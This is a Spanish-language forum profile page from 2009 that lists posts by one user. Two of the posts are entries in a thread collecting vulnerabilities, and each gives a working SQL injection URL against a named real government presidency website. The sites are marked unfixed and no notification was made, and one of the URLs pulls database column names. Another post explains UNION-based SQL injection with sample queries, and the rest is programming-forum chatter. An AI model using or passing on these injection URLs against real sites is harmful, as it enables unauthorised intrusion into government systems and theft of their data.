Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Krackwar ™

Páginas 1 2 3 4 5 6
#41
Nivel Web / Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
17 Febrero 2009, 19:58 PM


Sitio web:  http://www.presidencia.gov.py
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:

Código [Seleccionar]
http://www.presidencia.gov.py/detalle.asp?codigo=convert(int,(@@Version))
#42
Nivel Web / Re: Inyeccion Sql Filtro
17 Febrero 2009, 18:00 PM
Cita de: Azielito en 17 Febrero 2009, 17:42 PM
perdon, es que me hizo gracia :xD

no es personal pues, disculpa...

No importa  ;D

CitarTe explico

cuando haces una web que toma datos de una base de datos, para recuperar haces algo parecido a esto
Código (sql) [Seleccionar]

SELECT * FROM `noticias` WHERE id=$_GET['id']


Siempre haces eso (es un ejemplo xD) cuando haces un sistema de noticias, pero siempre tienes un "select" lo que hacemos a la hora de una SQLinjection es modificar ese "SELECT"

quedando algo así

Código (sql) [Seleccionar]

SELECT * FROM `noticias` WHERE id=-1 AND UNION SELEC 0,1,2.....
                                  ^aqui nuestro code

o sea que, el "SELECT" va implicito :o

Si me lo explicabas a mi , ya lo se  :xD si se hacer consultas desde PHP  ;) , aunque nunca esta de mas una explicacion para los que no entienden  ;)
#43
Nivel Web / Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
17 Febrero 2009, 07:10 AM

Sitio web:  http://www.presidencia.gob.bo
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:

Código [Seleccionar]
http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))
#44
Nivel Web / Re: Inyeccion Sql Filtro
17 Febrero 2009, 02:01 AM
No te rias toy enfermo a si que no tengo todas mis neuronas funcionando  :¬¬ .

Si , cierto que el select esta en el noticia.php.
#45
Sugerencias y dudas sobre el Foro / Re: Carga de Foro
16 Febrero 2009, 22:32 PM
A mi no me pasa
#46
Nivel Web / Re: Inyeccion Sql Filtro
16 Febrero 2009, 22:28 PM
hay no veo ningun select  :P
#47
Programación Visual Basic / Re: ¿como puedo crear un programa que genere anagramas?
16 Febrero 2009, 04:15 AM
Este es otro ejemplo de los tipicos que quieren que le hagan la tarea , ultimamente se estan viendo mucho.
#48
Programación Visual Basic / Re: Pa kien todo lo sabe sobre envio de correo desde VB
15 Febrero 2009, 18:42 PM
Si pero yo no lo revivi  :¬¬
#49
Programación Visual Basic / Re: Pa kien todo lo sabe sobre envio de correo desde VB
15 Febrero 2009, 05:57 AM
Usen las etiquetas de codigo  :¬¬

Código (vb) [Seleccionar]

Msgbox "Uso las etiquetas de codigo (code=vb)"
#50
Programación Visual Basic / Re: Mandar la informacion de un texbox a un label en Visual basic6.0
13 Febrero 2009, 20:53 PM
Deja de postear 2 veces cada cosa y leete un manual flojo de mie*** , lo mejor seria que no le respondieran nada a este tipoo.
Páginas 1 2 3 4 5 6